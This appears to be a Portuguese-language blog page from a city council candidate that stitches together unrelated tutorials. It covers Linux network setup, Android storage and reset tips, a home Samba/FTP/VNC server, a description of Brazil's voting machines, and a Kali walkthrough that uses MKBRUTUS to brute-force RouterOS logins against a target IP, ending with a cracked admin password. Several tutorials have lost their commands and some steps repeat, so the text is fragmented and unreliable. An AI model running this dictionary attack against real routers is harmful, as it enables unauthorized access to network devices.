Passo 1 – Desinstale o app
Passo 2 – Instale o Gerenciador de Arquivos

Passo 3 – Altere o nome dos arquivos


Passo 4 – Reinstale o WhatsApp

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista
http;//mrclaytonet.vereador.site
Pelo progresso de nossa cidade chega de ser ultrapassado por outras cidades mineiras em desenvolvimento, chega de atraso. Sou Barbacenense a vida toda e nunca vejo nossa cidade progredir ta na hora de ter alguem que realmente não tem medo de lutar pelo progresso e o povo na camara municipal de Barbacena essa pessoa sou eu Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista.
http://mrclaytonet.vereador.site
Assista este video:https://www.facebook.com/mrclaytonet/videos/1400996586582682/?hc_location=ufi
Configurar interfaces de rede na mão no ubuntu e debianConfigurando a rede na linha de comando no ubuntu e no debian Esse tutorial eu vou explicar como você pode configurar a rede no ubuntu todos os sabores (K) (X) (E), e debian todos os sabores. Irei mostrar os principais arquivos de configuração e os principais comandos de rede. Lembrando que no debian você deve substituir o comando sudo pelo su -c ‘comando dentro das aspas’ . O linux a sua rede funciona no modo texto, diferente do Windows que é modo gráfico , e sua configuração fica dentro de arquivos texto, no qual você pode manipular esses arquivos de acordo com a sua finalidade, é importante para qualquer usuário de linux saber como se pode configurar uma rede em modo texto, pois pode existir situações que só vai existir o modo texto. Primeiro vamos saber os principais Arquivos da rede. Todos os principais arquivos de configuração do Linux fica dentro do diretório /etc . O arquivo resolv.conf , esse arquivo fica o endereço de IP do seu servidor de DNS .É bom se ter um bom servidor de DNS pois quando você usa um servidor ruim sua rede pode ficar Lenta , você pode encontrar no site do abusar alguns endereços de servidores http://www.abusar.org/dns.html . No meu caso estou usando um servidor de DNS local na minha rede.
O arquivo hosts , fica a informação do nome da sua máquina e você pode colocar um nome de uma máquina dentro da sua rede que você pode criar um apelido para ela , e acessar ela no seu navegado.
Conteúdo
O arquivo interfaces fica dentro do diretório /etc/network, esse arquivo armazena a configuração das suas interfaces de rede, nele você manipula a forma que sua rede se comporta , você pode escolher em deixar sua interface como dhcp ou como ip stático , e também pode criar ip alias . “IP alias é uma apelido que você pode dar a sua interface de rede na qual você pode atribuir outros endereços de rede, você pode criar quantos ip alias desejar”.
O conteúdo do meu arquivo.
Os principais comandos de rede são: ifconfig , ifup, ifdown, route, iwconfig , dhclient. Usando o dhclient para pegar ip por dhcp.
Atribuindo um endereço de ip a uma interface de rede usando ifconfig . Atribuindo um ip alias a uma interface de rede usando ifconfig, no lugar do 1 você pode colocar qualquer nome ou numero.
Listando as interfaces existentes usando ifconfig .
Derrubando uma interface usando ifconfig.
levantando uma interface usando ifconfig.
Agora usando o ifup e ifdown. Derrubar todas as interfaces e seus endereços de ip.
Levantando todas as redes de acordo com os dados do arquivo /etc/network/interfaces
Agora usando o comando route. O comando route define a rota ou a interface padrão da sua placa de rede. Para saber as rotas existentes na sua maquina use esse comando.
Atribuindo o gateway padrão da sua rede usando o comando route .
Atribuindo uma interface como padrão.
Agora vamos configurar a nossa rede usando o arquivo /etc/network/interfaces Configurando a rede como DHCP padrão na interface eth0 .
Configurando a interface eth0 com ip estático.
Configurando sua rede como ip alias estático .
Depois de configurar o arquivo derrube as interfaces.
Depois levante .
Para reniciar a sua configuração de rede existe esse comando.
|
Uma das restrições que encontramos em nossos X10 Mini Pro é a pouca quantidade de memória interna. Instalamos alguns apps e pronto! A memória está cheia. Para contornarmos isso existe a opção de instalação dos apps diretamente no cartão SD, coisa que o Android 2.2 (Froyo) já faz por Default. Confesso que um dos motivos que me fez fazer root no meu mini pro foi justamente a intenção de contornar este problema, no entanto, após rotear o celular notei que para usar o app App2Sd teria que fazer uma série de modificações como instalar uma nova Rom, atualizar o OS, limpar todo conteúdo do cartão de memória, utilizar comandos via ADB e outras modificações que demandariam muito trabalho e riscos. Segue aqui um pequeno tutorial de como fazer este procedimento usando o Aplicativo chamado Link2SD.
O que o Link2SD faz ?
Como o próprio nome sugere, o aplicativo transfere os apps para o cartão de memória criando um Link no sistema Android. Assim o Android apenas guardará no seu sistema uma referência ao app e não o próprio app, consumindo assim um espaço infinitamente menor na sua memória interna.
O procedimento é arriscado ?
De forma alguma, basta um aparelho rooteado. Não envolve conhecimentos avançados, nem instalação de novas ROM’s
Qual o ganho de memória esperado ?
No meu caso estava com alguns poucos e básicos apps instalados no X10 mini pro e o Android já estava acusando “pouca memória interna” coisa que ele faz quando chagamos a apenas 20mb de memória livre. Após a configuração do Link2SD minha memória livre chegou a espantosos 120mb, hoje tenho mais de 200 app instalados (fora os de sistema) e ainda me sobram 63mb de memória livre. Ou seja, compensa e muito.
Vamos a configuração:
1) Primeiramente faça Backup de todo conteúdo do seu cartão SD. Este procedimento é bem símples, basta conectar o celular via USB selecionar “montar cartão SD” no aparelho. Abra o drive do cartão pelo explorer do windows. Vá em “ferramentas” “opções de pastas” “modo de exibição” e selecione “mostrar pastas e arquivos ocultos” agora crie uma pasta no seu Desktop e copie todo conteúdo do cartão de memória para a mesma. Feito isso, pode desmontar o cartão SD e desconectar o Cel.
2)Formatando e particionando o cartão de memória.
A) Precisamos agora criar uma nova partição em nosso cartão SD e para isso utilizaremos o programa MiniTool Partition Wizard 5.2. Baixe o programa e instale no seu PC / Notebbok.
B-) No seu celular você deve entrar em “configurações” “aplicativos” “desenvolvimento” selecione as opções “Depuração USB” e “Permitir locais Fictícios” Agora pode conectar o cel. novamente no PC e montar o cartão SD.
C) Feito isso vamos agora trabalhar com o MiniTool Partition Wizard (você pode encontrar o programa “free” facilmente pela net)
Abra o MiniTool, deve aparecer a imagem seguinte:
C1) Disk 2 representa o seu cartão de memória, nós vamos deletar esta partição e criar duas novas. (desconsidere o tamanho das partições mostradas nas imagens pois servem apenas a título de exemplo)
C2) Agora clique com o botão direito do mouse na parte cinza “unallocated” e crie uma nova partição
C3) Escolha as opções Primary e FAT32, com o mouse escolha o tamanho da partição. o que sobrar irá ser a partição do Link2SD. Ou seja, neste passo o tamanho da partição vai variar de acordo com o tamanho do seu cartão de memória. Notem na minha primeira imagem (qual o ganho de memória esperado?) que como possuo o cartão original que acompanha o cel. 4Gb formatei da seguinte maneira. SD Card 3.18Gb deixando o restante para a segunda partição, no meu caso, Sd card 2nd pat 501Mb.
C4) Agora vamos criar outra nova partição, no caso uma partição Ext2. Clique com o direito novamente em “Unallocated” e clique em create.
C5) Agora escolha Primary e Ext2, essa será a partição do Link2Sd. No meu caso criei uma partição com 501Mb que foi o espaço sobrado no meu cartão SD.
C6) Por fim clique em Aplly no canto esquerdo superior.
C7) Agora desmonte o cartão SD, desconecte o celular e reinicie o mesmo (não esqueça, tem que reiniciar o cel).
2) Trabalhando com o Link2SD
2-1) Na tela inicial do aplicativo entre nas configurações e selecione “Filter”
2-2) Selecionando como na imagem a seguir o app apresentará uma lista de todos os apps instalados no seu cel com exceção dos apps do sistema.
2-3) Clicando em qualquer app listado deve aparecer a imagem seguinte. Você deve clicar em “Create Link” e a partir daí, caso apareçam outras mensagens é só ir dando ok.
2-4) Refaça novamente o procedimento para ir passando outros apps para o cartão de memória.
2-5) Depois de terminado o procedimento você deve clicar em “Storage Info” para visualizar como ficaram distribuídos os seus apps dentro do cartão e memória interna do Cel.
2-6) Agora você tem que reiniciar o Cel. caso contrário os seus apps não vão aparecer na sua lista de app padrão do seu Android. Caso você esteja usando apps que utilizam Widget, provavelmente você terá que adicioná-los novamente na sua tela inicial.
Está pronto! Agora você tem bastante espaço livre para instalar o que quiser. Lembre-se que a medida que for instalando novos app você terá que fazer o procedimento novamente para direcionar o novo app para o cartão de memória. Espero que tenha ajudado a todos.
Veja nesse tutorial como você o Hard Reset no seu Motorola Moto G estando com a versão de Android 5.0 ou superior ou seja o Android Lollipop. Esse procedimento seve para voltar o aparelho aos padrões de fábrica, sendo bastante utilizado quando se esquece a senha do aparelho, ou seja, para desbloquear o aparelho no caso de esquecimento de senhas. Também para corrigir alguns pequenos problemas de funcionamento do aparelho.
Guardar seus arquivos de forma segura nunca foi tão fácil. Quem não gosta de armazenar seus dados com métodos tradicionais (pendrives, CDs, DVDs e HDs portáteis) pode muito bem usufruir de uma enorme variedade de serviços de armazenamento na nuvem como Dropbox, Google Drive e SkyDrive.
Contudo, digamos que você quer mais, muito mais. Não quer depender de servidores terceirizados, que podem muito bem apresentar problemas e sumir com seus documentos confidenciais em questão de pouquíssimos minutos. Embora seja pouco provável que os gigantescos datacenters da Microsoft ou da Google apresentem problemas, os mais neuróticos sempre mantêm essa possibilidade em mente.
Sendo assim, que tal montar seu próprio servidor de arquivos? Além de ser fácil e rápido, o procedimento é bastante barato, visto que você pode usar peças de PCs antigos que você não utilize mais (ou comprá-las em lojas de artigos usados). Além de armazenar de forma mais segura e privada os seus dados importantes, você também pode usar seu servidor para hospedar sites (economizando aquela graninha que você gastava no seu host). O Mr Claytonet ensina a você como fazer tudo isso em apenas sete passos simples! Confira.
(Fonte da imagem: Reprodução/Baixando Wallpapers)
1) Monte o hardware
Você se lembra daquele computador antigo que você não usa mais e que está acumulando pó desde o ano passado? Hora de revivê-lo e dar um novo trabalho para o bom velhinho. Caso você seja menos apegado e já tenha se livrado da sua máquina anterior, o jeito é montar um PC especialmente para o servidor adquirindo algumas peças que podem ser facilmente encontradas em lojas de artigos de informática. Dar uma conferida em e-commerces de usados também é uma boa pedida (sim, estamos falando do Mercado Livre). Basicamente, você vai precisar de:
Uma placa-mãe (não precisa ser um modelo muito recente);
Um processador de pelo menos 2 GHz ;
No mínimo 512 MB de memória RAM;
Um disco rígido da quantia que você desejar. Que tal 1 TB?
Fazendo uma rápida pesquisa na internet, é possível realizar uma cotação bastante precisa dos gastos desse servidor. Uma placa-mãe razoável gira em torno de R$ 199; um pente de 512 MB de memória RAM pode ser encontrado facilmente por cerca de R$ 80. Caso esteja com o orçamento apertado, opte por um Intel Celeron (cerca de R$ 100) na hora de comprar o processador. Se estiver com um pouquinho mais de grana para investir, opte por um Intel Dual Core E3300 (entre R$ 149 e R$ 199).
Por fim, chegamos ao item mais importante: o disco rígido. Um bom HD Seagate de 1 TB e 7200 RPM pode ser encontrado por pelo menos R$ 220. Se 500 GBs foram o suficiente para você, basta reservar R$ 150 por um drive da mesma marca. Quanto gastamos ao todo? Cerca de R$ 700.
(Fonte da imagem: Reprodução/Wikimedia)
2) Instale Linux
Não importa se você é um fã da Microsoft e não consegue se desapegar do clássico sistema operacional Windows: é necessário instalar o Linux para fazer seu servidor funcionar corretamente. Recomendamos que opte pelas distribuições Ubuntu ou Xubuntu. Ambas são completamente gratuitas e razoavelmente leves, não ocupando muito espaço em seu precioso disco rígido.
Instale a ISO gravando-a em um CD/DVD ou através de um pendrive bootável – clique aqui para aprender como fazê-lo, caso ainda não saiba. Importante: para os próximos passos deste tutorial, considere que utilizamos o Ubuntu 12.04 (um dos mais populares) para descrever as ações que você fará. Instalamos o SO em português.
(Fonte da imagem: Reprodução/HiTrend)
3) Limpe o sistema operacional
Qualquer distro Linux vem repleta de softwares adicionais que devem ser desinstalados antes que você prossiga. Utilize o Synaptic (gerenciador de pacotes também incluso nas distribuições) para desinstalar programas como AbiWord, OpenOffice/LibreOffice, Thunderbird, Gaim, GIMP, Firefox, Rhythmbox etc.
Em seguida, cheque se o sistema operacional não possui atualizações disponíveis. Se houver, baixe e instale todas por questões de segurança, garantindo a estabilidade do seu servidor. Por fim, desative o bloqueio de tela (através do menu Configurações do sistema > Brilho e bloqueio).
4) Configure o compartilhamento de arquivos
Tudo pronto, hora de iniciar as configurações e todo o trabalho pesado. Antes de tudo, instale o Samba, o programa que fará seu computador atuar como servidor e permitir o compartilhamento de arquivos em rede. Você pode consegui-lo através do próprio Synaptic (pesquisando novas aplicações e marcando-o para instalação) ou pela Central de Programas do Ubuntu. O app também está disponível no Baixaki.
(Fonte da imagem: Reprodução/iMasters)
Abra o terminal (Painel de controle > Terminal ou hotkey Ctrl+Alt+T) e digite sudo su para entrar no modo root. Será necessário reinserir a sua senha. Entre no diretório de instalação do Samba digitando cd /etc/samba. Escreva nano smb.conf e aperte Enter para iniciar o processo de configuração.
Apague todo o texto do documento (segure as teclas Ctrl+K até deletar tudo) e cole/digite o texto que pode ser encontrado neste link (substituindo “Name” e “Server Name” com o nome de usuário e nome da máquina). Salve o documento (Ctrl+O) e feche-o (Ctrl+X). É necessário especificar uma senha para acessar o Samba; para isto, digite o comando sudo smbpasswd -a. Por fim, reinicie os processos do programa, escrevendo sudo restart smbd e sudo restart nmbd.
5) Adicionando capacidade FTP
Abra o terminal outra vez (novamente: Painel de controle > Terminal ou hotkey Ctrl+Alt+T) e ganhe acesso root de novo (digitando sudo su e inserindo sua senha do SO). Escreva o comando sudo apt-get install proftpd para instalar o software ProFTPD. Quando você for questionado sobre o tipo de servidor que deseja configurar, escolha a opção “Standalone”.
Mude para o diretório de instalação com a mensagem cd /etc/proftpd/. Configure-o digitando o comando sudo nano /etc/proftpd/proftpd.conf. Substitua todo o conteúdo do arquivo que se abre pelo código que pode ser encontrado neste link.
Salve as configurações (Ctrl+O e em seguida Ctrl+X) e reinicie o servidor, inserindo o comando /etc/init.d/proftpd restart.
6) Configure o acesso Shell (SSH)
Ainda no terminal e em modo root, instale o OpenSSH (apt-get install openssh-server) e o VNC Server (sudo apt-get install vnc4server). Configure uma senha para este último aplicativo (digite vncpasswd e insira duas vezes uma senha de 6 caracteres). Crie um comando de login personalizado digitando sudo nano /usr/local/bin/sharex11vnc. Um novo arquivo será aberto e você deve colar/digitar o seguinte conteúdo dentro dele:
#!/bin/sh
x11vnc -nap -bg -many -rfbauth ~/.vnc/passwd -desktop “VNC ${USER}@${HOSTNAME}” \
|grep -Eo “[0-9]{4}”>~/.vnc/port
Calma, ainda não acabou! Defina os direitos do usuário através do comando sudo chmod 755 /usr/local/bin/sharex11vnc. Feche o terminal e permita que o script do VNC Server recém-criado seja iniciado junto ao Linux: percorra o caminho Painel de Controle > Aplicativos de Sessão e clique no botão “Adicionar”. Escreva sharex11vnc nos dois primeiros campos da janela que se abre e dê um “Ok”.
Por fim, ative o login automático de sua conta no Ubuntu (percorrendo o caminho Aplicações > Configurações > Contas de Usuário e marcando a caixa de seleção “Iniciar sessão automaticamente”).
7) Divirta-se!
Finalmente, seu servidor está pronto, com todos os softwares configurados e login automático ativado! Retire todos os componentes inúteis da máquina (mouse, teclado, monitor e até mesmo o leitor/gravador de CD e DVD) e plugue o cabo de internet (não é recomendado utilizar conexão WiFi).
Para se conectar ao seu servidor, você pode usar diversos programas como o PuTTy ou o FileZilla. Na maioria das vezes, tudo o que você precisa fazer é definir o endereço IP do servidor (você deve conferir essa informação antes a partir do PC com Linux), informar a porta (5900) e o destino (localhost:5900).
Lembre-se também de que você pode instalar complementos à vontade de acordo com sua necessidade, como TorrentFlux, Apache, MySQL e phpMyAdmin.
FONTE(S): INTAC
O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.
Veja o ataque na pratica:
01 Passo
Verifique a versão atual do python em seguida realiza a instalação da versão 3
root@kali:~# python –version (Exibe a versão do Python)
root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)
02 Passo
Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.
root@kali:~# python –version (Exibe a versão do Python)
03 Passo
Realize o download do projeto mkbrutus
root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus
04 Passo
Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.
root@kali:~# chmod -R 755 mkbrutus/
root@kali:~# cd mkbrutus/
root@kali:~/mkbrutus# ls -l
05 Passo
Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.
root@kali:~/mkbrutus# python3 mkbrutus.py -h
-h : Help (Ajuda)
06 Passo
São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.
07 Passo
Crie um arquivo de senhas ou realize o download de uma lista nos sites:
Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net
root@kali:~/mkbrutus# cat senhas.txt
Conteúdo do arquivo senhas.txt
08 Passo
Realize o ataque no equipamento utilizando os seguintes parâmetros.
root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt
Usuário: admin
Senha: P@ssw0rd
O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.
Desenvolvedores:
Ramiro Caire | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa
Projeto: github.com/mkbrutusproject/mkbrutus
Fonte: 100security
A urna eletrônica é um microcomputador de uso específico para eleições.
Ela apresenta as seguintes características: resistência, pequenas dimensões, baixo peso, autonomia de energia e recursos de segurança.
Sistema Operacional da urna eletrônica
Até 2006, a urna eletrônica utilizava o sistema operacional VirtuOS e Windows CE que possibilitavam o compartilhamento do processador por diferentes processos que são realizados simultaneamente. Os modelos de urna 1996 a 2000 rodavam o sistema operacional VirtuOS.Os demais modelos de urna: 2002, 2004 e 2006 rodavam o sistema operacional Windows CE.
MODELO |
SISTEMA OPERACIONAL PROCESSADOR |
|
UE 96 | Virtuos | 386- 25MHZ |
UE 98 | Virtuos | Cyrix GX 133 |
UE 2000 | Virtuos | Cyrix GX 166 |
UE 2002 | Windows CE | Cyrix GX 166 |
UE 2004 | Windows CE | Cyrix GX 200 |
UE 2006 | Windows CE | Processador 433 Mhz – 128MB DDR |
A partir das Eleições de 2008, o TSE adotou uma única plataforma, baseada no software livre Linux, que é usado até os dias atuais. Essa troca trouxe três grandes vantagens. A primeira delas é a economia, já que o governo não terá mais que adquirir as licenças dos antigos sistemas proprietários. A segunda vantagem diz respeito à transparência do processo, pois é um mecanismo aberto em que todo código-fonte está disponível ao público e pode ser auditado livremente. E em terceiro lugar, vem a segurança, já que o Linux é um sistema reconhecidamente mais seguro.
Além disso, pode-se destacar que a padronização do uso do software livre Linux, em todos os modelos de urna, traz a vantagem de se gerenciar melhor as contingências durante as Eleições.
Sistema de Segurança e Sistemas Eleitorais
Existem dois importantes sistemas relacionados à urna eletrônica, que são utilizados nos computadores da justiça Eleitoral. São eles: o Subsistema de Instalação – SIS e o Segurança Gerenciador de Dados e Aplicativos da Urna Eletrônica – GEDAI. O SIS tem por sua vez a grande função de controlar o acesso. Este sistema permite a criação de um trabalho homogêneo e seguro possibilitando o controle do processo de inseminação de informações nas urnas e, também, garante que sistemas eleitorais, como o GEDAI, somente sejam instalados nos equipamentos da Justiça Eleitoral.
Já o GEDAI é o sistema responsável por transferir dados, das seções eleitorais como a tabela de eleitores de cada seção, fotos dos candidatos, bem como o Sistema Operacional UE-nux (Linux da urna) entre outros, que são transferidos para um flash card (Memória Flash – figura abaixo) de carga e futuramente inseridos nas urnas eletrônicas. É ainda o GEDAI o programa responsável pela gravação das memórias de resultados que introduzem na Urna todos os programas utilizados durante as eleições.
O sistema como um todo tem início com a compilação do código-fonte. Uma equipe de técnicos do TSE insere as chaves e as rotinas criptográficas. Encerrada a compilação dos programas tem início a preparação dos pacotes, que contém todos os programas utilizados na urna eletrônica. Estes pacotes são cifrados e enviados aos Tribunais Regionais Eleitorais juntamente com o cadastro nacional de todos os eleitores.
A última etapa percorrida pelo software para chegar à urna eletrônica é feita por meio do flash card. No processo de inseminação de informações o flash card de carga é inserido no slot de flash externo e a urna é ligada. A inicialização da urna é feita a partir do flash card externo e é seguida da execução de programas que formatam o flash card interno e copiam os arquivos de aplicação, os arquivos do sistema operacional e os arquivos de controle. A urna é então desligada e o flash card de carga é substituído pelo flash card de votação e juntamente a esse flash é inserida uma memória de resultado de votação e a urna é ligada novamente.
São realizados então, vários procedimentos de verificação de integridade do hardware e do software.
Não sendo encontrados problemas, a urna é desligada, lacrada e está pronta para ser utilizada no dia da votação!
Segundo turno
Para o segundo turno de uma eleição não é dada nova carga na urna. O programa aplicativo é o mesmo utilizado no primeiro turno da eleição, sendo necessário apenas informar a nova lista de candidatos. A preparação da urna é feita apenas através de uma nova memória de resultado específica que contém as informações dos candidatos que concorrem ao segundo turno.
Todas as urnas eletrônicas utilizam o mesmo programa de votação. O que difere uma urna da outra são os dados nelas inseridos, tais como:
O terminal do mesário e o terminal do eleitor
Dois terminais compõem a urna: o terminal do mesário, no qual o eleitor é identificado e autorizado a votar. Observando-se que nos modelos de urna a partir de 2009, a identidade pode ser verificada por meio da biometria. E o terminal do eleitor, onde o voto é registrado numericamente.
O terminal do mesário é posicionado próximo ao presidente da mesa, sendo constituído por um teclado numérico que vai do 0 ao 9, as teclas “confirma” e “corrige”, um visor de cristal líquido e as teclas de sinalização que indicam quando a urna está sendo alimentada por energia externa ou interna, além de indicar ainda se a urna está sendo utilizada por algum eleitor ou se ela já está liberada para o próximo. É ainda no terminal do mesário que o presidente da seção eleitoral digita o número do título de eleitor e, confirmada a sua identidade, o autoriza a votar. Nas seções onde há identificação biométrica, antes da habilitação, o eleitor tem sua identidade validada pela urna, dessa forma, um eleitor não pode votar por outro.
O presidente da mesa também digita a senha de encerramento da votação no terminal do mesário.
Quando a senha de encerramento é confirmada, o terminal do eleitor imprime, automaticamente, a 1ª via do Boletim de Urna (B.U.) Se a impressão estiver correta, o presidente da mesa aperta a tecla “confirma” no terminal do eleitor e, enquanto são emitidas as outras quatro vias obrigatórias do B.U., os dados da votação são gravados na memória de resultado que servirá para a exportação dos dados daquela seção.
No terminal do eleitor encontra-se a tela de cristal líquido, onde são visualizadas as instruções para o eleitor, bem como durante a votação, o nome, número, partido e foto do candidato escolhido. Também encontramos no terminal do eleitor um teclado numérico com teclas de 0 a 9, além das teclas “branco”, “corrige” e “confirma”.
Três pequenos sinais visuais (Ieds) auxiliam o mesário, informando-o se o terminal está disponível para o eleitor, se já completou seu voto e se a urna eletrônica está funcionando ligada à corrente elétrica ou à bateria interna.
Já o terminal do eleitor possui teclado numérico, onde é registrado o voto, e uma tela de cristal líquido, onde são registradas as mensagens que orientam o eleitor para o registro de seu voto.
A urna funciona ligada à rede de energia elétrica, seja ela 110V ou 220V. Se faltar energia no dia da eleição, cada urna possui uma bateria interna com capacidade para funcionamento de 12 horas.
E se ainda não for suficiente, a urna poderá ser ligada a uma bateria de carro!
Outros dispositivos da urna eletrônica
Além do teclado e do monitor de vídeo, a urna também possui:
Biometria
A palavra biometria vem do grego: bios (vida) e metron (medida). Designa um método automático de reconhecimento individual baseado em medidas biológicas (anatômicas e fisiológicas) e características comportamentais.
As biometrias mais implementadas, ou estudadas, incluem as impressões digitais, reconhecimento de face, íris, assinatura e até a geometria das mãos. Porém, muitas outras modalidades estão em diferentes estágios de desenvolvimento e estudos. As impressões digitais, por exemplo, vêm sendo usadas por mais de um século, enquanto a íris é objeto de estudo há pouco mais de uma década. Não existe ainda uma modalidade biométrica que se aplique em todas as situações.
Muitos fatores devem ser levados em conta para se implantar um sistema biométrico, tais como localização, riscos de segurança e número de usuários, entre outros.
Todo sistema biométrico é preparado para reconhecer, verificar ou identificar uma pessoa que foi previamente cadastrada.
Na biometria, o procedimento de verificação ocorre quando o sistema confirma uma possível identidade comparando apenas parte da informação com o todo disponível. Já o processo de identificação confirma a identidade de um indivíduo, comparando o dado fornecido com todo o banco de dados registrado.
A biometria é usada em inúmeros lugares para melhorar a segurança ou conveniência dos cidadãos. No Brasil, a emissão de passaporte, de carteiras de identidade e o cadastro das Polícias Civil e Federal contam com sistemas biométricos.
Além disso, muitas empresas adotam tais sistemas para acesso às suas instalações ou utilização de seus serviços. É o caso de algumas academias de ginástica que usam a leitura da impressão digital para controlar o acesso dos seus frequentadores.
Para o reconhecimento individual são coletados dados biométricos por meio de sensores que os colocam em formato digital. Quanto melhor a qualidade do sensor, melhor será o reconhecimento alcançado. No caso do cadastramento que será efetuado pela Justiça Eleitoral, os dados serão coletados por um scanner de alta definição.
Votação em urna com leitor biométrico
Com a adoção da nova tecnologia de identificação por meio dos dados biométricos os eleitores mal notaram as mudanças na hora de votar. Isso porque a urna com leitor biométrico informatizou um procedimento operacional: a liberação das urnas não mais é feita pelos mesários, mas sim pela leitura das impressões digitais do próprio eleitor. É a tecnologia a serviço da segurança do voto e da lisura do processo eleitoral.
Produtos gerados pela urna
A urna eletrônica somente grava a indicação de que o eleitor já votou. Pelo embaralhamento interno e outros mecanismos de segurança, não há nenhuma possibilidade de se verificar em quais candidatos um eleitor votou, em respeito à Constituição Federal brasileira, que determina o sigilo do voto.
Após o encerramento da votação, são gravados na Memória de Resultado da urna eletrônica os seguintes arquivos:
Todos os arquivos são assinados digitalmente. O Boletim de urna e o registro digital do voto, além de assinados, são criptografados.
Contingências
Caso ocorra algum problema com a urna eletrônica durante a votação, serão adotados procedimentos de contingência para saná-lo.
Procedimentos de contingência: a Justiça Eleitoral prevê a adoção de procedimentos que visam sanar problemas apresentados na urna eletrônica durante a votação, apuração ou ainda falhas operacionais cometidas pelos mesários. Esses procedimentos são conhecidos como contingências de Votação e Apuração e nem sempre são capazes de resolver todas as situações. Por isso, existe a possibilidade de se ter votação totalmente manual (com a utilização de cédulas e urna convencional) ou votação mista (parte eletrônica e parte manual).
Contingências de votação: esses procedimentos utilizam urnas e flash cards previamente preparados para esse fim e, em último caso cédulas de votação em papel.
Urna de Contingência: na fase de preparação das urnas, na audiência de carga e lacre, algumas são preparadas para essa finalidade, são as “urnas de contingência”. Essas urnas são utilizadas para substituir aquelas que apresentarem defeitos durante a votação. No ato da substituição o flash card e a memória de resultado de votação são transferidos da urna com defeito para esta urna, havendo dessa forma uma migração dos votos já registrados para a urna de contingência que é lacrada e passa a ser a urna da seção.
Flash de Contingência: este procedimento é utilizado quando o procedimento de urna de contingência foi utilizado, mas não resolveu o problema. Consiste na utilização de um flash previamente preparado para essa função, no processo de geração de mídias, em substituição do flash de votação da urna que apresentou problemas. Após a troca, a urna é novamente lacrada.
Votação manual: na situação em que tanto a adoção da urna de contingência e do flash de contingência não consigam sanar o problema não resta alternativa a não ser a utilização da votação manual (por cédulas).
Encerrar Votação na Junta Eleitoral: este procedimento é utilizado para encerrar a votação quando por falha operacional, o mesário desligou a urna sem executar a rotina de encerramento da votação.
Recuperar Dados Para a Totalização: Este procedimento de contingência é utilizado quando não foi possível a leitura da mídia gerada na urna eletrônica para o totalizador ou quando o dado lido foi rejeitado na fase de processamento de boletim de urna no totalizador. Nessa situação o sistema recuperador de dados (RED) gera uma nova memória de resultado a partir da urna originária.
Recuperar Dados Para o Sistema de Apuração (SA): Este procedimento é utilizado para recuperar dados parciais (votos lançados na urna eletrônica) em caso de votação mista, para posterior computação desses votos com aqueles registrados em cédulas, no Sistema de Apuração.
Vantagens do uso da urna eletrônica
A urna eletrônica detém uma série de vantagens. A principal delas, sem dúvida, é impedir fraudes. Além disso, pode-se citar:
destaque para o teclado em Braile
(BU) com todos os votos já apurados, ou seja, o resultado da eleição naquela urna é imediato.
Segurança da Urna Eletrônica
O processo eletrônico de votação possui mecanismos imprescindíveis para assegurar sua segurança: a assinatura digital e o resumo digital.
A assinatura digital é uma técnica criptográfica para garantir que um conteúdo, no caso um arquivo digital, possa ser verificado principalmente no que se refere à sua integridade, isto é, busca garantir que o programa de computador não foi modificado de forma intencional ou não perdeu suas características originais por falha na gravação ou leitura. Isso significa que se a assinatura digital for válida, o arquivo não foi modificado.
A assinatura digital também é utilizada para assegurar a autenticidade do programa, ou seja, confirmar que o programa tem origem oficial e foi gerado pelo Tribunal Superior Eleitoral. Neste caso, somente quem assinou digitalmente pode ter gerado aquela assinatura digital.
Já o resumo digital, também chamado de resumo criptográfico ou hash, é uma técnica criptográfica que se assemelha a um dígito verificador. Dado um arquivo digital, pode-se calcular o resumo digital desse arquivo com um algoritmo público (método matemático conhecido por todos). No caso dos sistemas de urna, são calculados os hashs de todos os arquivos e esses resumos são publicados no Portal do TSE.
Assinatura digital e lacração
Onde: TSE.
Quando: Até 20 dias antes da eleição.
Quem: Partidos políticos, Ordem dos Advogados do
Brasil (OAB) e Ministério Público (MP).
O que é apresentado: A versão final dos sistemas eleitorais; Códigos-fonte e executáveis; Manuais; Documentação.
Processos: É efetuada a compilação dos programas computacionais na presença dos representantes, bem como a geração de resumos digitais (hashes) dos programas. É dada permissão, aos representantes, para assinar digitalmente os sistemas eleitorais, com programa próprio, para posterior verificação (resolução-TSE). Além disso, os sistemas (fontes e executáveis) são assinados digitalmente pelo TSE, gravados em mídia não regravável, lacrados e armazenados no cofre. Os representantes poderão apresentar impugnação fundamentada ao TSE.
Entregas:
São entregues aos representantes dos partidos políticos, OAB e MP:
– Resumos digitais (hashes) de todos os sistemas, também publicados na Internet;
– Memória de resultado de verificação de assinatura digital para microcomputador, urna e servidor. Após a lacração, ocorrem os seguintes eventos:
– Os sistemas são distribuídos pela rede privativa da Justiça Eleitoral aos TREs;
– Os sistemas eleitorais só funcionam nos computadores da Justiça Eleitoral;
– Os sistemas são ativados por meio de senhas geradas pelo TSE.
Por uma questão de segurança, os sistemas eleitorais só funcionam nos computadores da Justiça Eleitoral. Desta forma, mesmo que os sistemas sejam interceptados, não há possibilidade de instalação dos arquivos em computadores externos.
Os sistemas são ativados por meio de senhas geradas pelo TSE, ou seja, além de só funcionarem em computadores da Justiça Eleitoral, é necessário ainda o uso de senha para ativação do sistema. As senhas são geradas somente pelo Tribunal Superior Eleitoral, de forma personalizada e controlada, e distribuídas para todo o Brasil.
Criptografia
A criptografia digital é um mecanismo de segurança para o funcionamento dos programas computacionais. Como os dados tornam-se “embaralhados”, eles ficam inacessíveis a pessoas não autorizadas.
O Tribunal Superior Eleitoral usa algoritmos de cifração simétrica e assimétrica proprietários, de conhecimento exclusivo do TSE.
